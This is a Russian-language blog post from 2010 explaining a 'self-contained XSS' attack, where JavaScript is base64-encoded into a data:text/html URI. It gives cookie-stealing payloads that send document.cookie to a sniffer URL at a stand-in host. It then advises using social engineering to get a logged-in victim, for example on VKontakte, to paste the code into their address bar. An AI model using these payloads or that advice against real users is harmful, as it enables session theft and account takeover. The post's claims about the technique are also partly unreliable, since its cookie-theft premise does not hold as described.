Все идеи, предпочтения и предложения следует отправлять по адресу nullbyte0x00@gmail.com

15 нояб. 2010 г.

Self-contained XSS (Самодостаточная)

Попытаюсь объяснить как можно понятней. Эта статья не о снифферах или XSS, об этом вы можете прочитать в других статьях. Рекомендую перед прочтением этой статьи ознакомиться с простыми XSS и снифферами.


Что же такое самодостаточная XSS.

Это XSS атака, которой не требуется XSS уязвимость в Веб приложениях(сайтах проще говоря). Это код javascript закодированный в Base64 кодировку, и правильно переданный браузеру(программе с которой вы просматриваете сайты). Я покажу как это всё делать поэтапно, так-что если чего-то не поняли сейчас, не пугайтесь.

Итак, что же нам нужно для проведения такова типа атаки(на себе):
1. веб браузер(firefox, opera, IE8 и выше, и другие браузеры)
2. программа, либо скрипт, который кодирует текст в Base64(Скрипт онлайн)
3. код для обращения к браузеру(data:text/html;base64,)
4. онлайн сниффер для получения куков

Шаг1. Пишем javascript для атаки.

Итак, покажу 2 примера для javascript.

Пример 1. Вызов сообщения с текстом.
Сам скрипт

Код:
<script>alert('XSS')</script> (текст)
Код:
<script>alert(document.cookie)</script> (сообщение с куками)
Пример 2. Отправка куков на сниффер.
Скрипт
Код:
<sсriрt>img = new Image(); img.src = "http://page.com/sniffer.php?"+document.cookie;</sсriрt>
либо если у вас сниффер с картинкой

Код:
<sсriрt>img = new Image(); img.src = "http://page.com/pic.jpg?"+document.cookie;</sсriрt>
Шаг2. Кодируем и добавляем спец. код.

1. Заходим на онлайн кодировщик(выше есть линк)
2. Вписываем в поле для текста скрипт <script>alert('XSS')</script> и жмём кнопку чтоб закодировать, получаем PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
3. Добавляем код(data:text/html;base64,) в начало закодированного скрипта, получаем data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8 L3NjcmlwdD4=

Шаг 3. Последний, выполняем атаку.

Теперь для проведения атаки нам нужно поместить наш закодированный скрипт с кодом в адресную строку браузера(туда где пишем google.com и т.д., при этом http:// стираем тоже, вписываем всё в пустую строку. Попробуйте вписать туда data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8 L3NjcmlwdD4= и выскочит сообщение "XSS". Для получение куков при такой атаке должен быть открыт сайт и подключён пользователь, с которого хотим получить куки, т.е. к примеру зайти на вконтакт и подключиться, и тогда только вводить наш код.

Замечание.
Это всё было проведено на нашем компьютере. Если вы хотите провести атаку на другом человеке, то пользуйтесь социальной инженерией и заставьте человека ввести ваш код в адресную строку.

Автор 0x00(c)
Автор: 0x00 на 19:18

1 комментарий:

  1. Unknown23 июня 2016 г. в 19:27

    Очень круто! Нужно будет побольше про этот base64 узнать!

    ОтветитьУдалить

Подписаться на: Комментарии к сообщению (Atom)